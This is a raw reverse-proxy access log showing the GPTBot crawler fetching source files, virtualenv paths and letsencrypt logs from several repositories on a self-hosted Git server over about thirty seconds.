"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11044] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16647] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13600] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 20280] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13377] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11056] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10077] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main" [Client 74.7.227.38] [Length 2844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/branches" +[17/Feb/2026:16:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main" [Client 74.7.227.38] [Length 14721] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:16:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33635] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31271] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23704] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23730] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10969] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33606] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31298] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33410] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33441] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10940] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35841] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38734] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35812] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38763] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:16:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11045] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" +[17/Feb/2026:16:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 30674] [Gzip 7.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:16:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12553] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:16:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json?display=source" [Client 74.7.227.38] [Length 11109] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" +[17/Feb/2026:16:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" +[17/Feb/2026:16:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16647] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33636] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11401] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23732] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38765] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35844] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10971] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:16:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33444] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31301] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11367] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11401] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12786] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15352] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13520] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15351] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 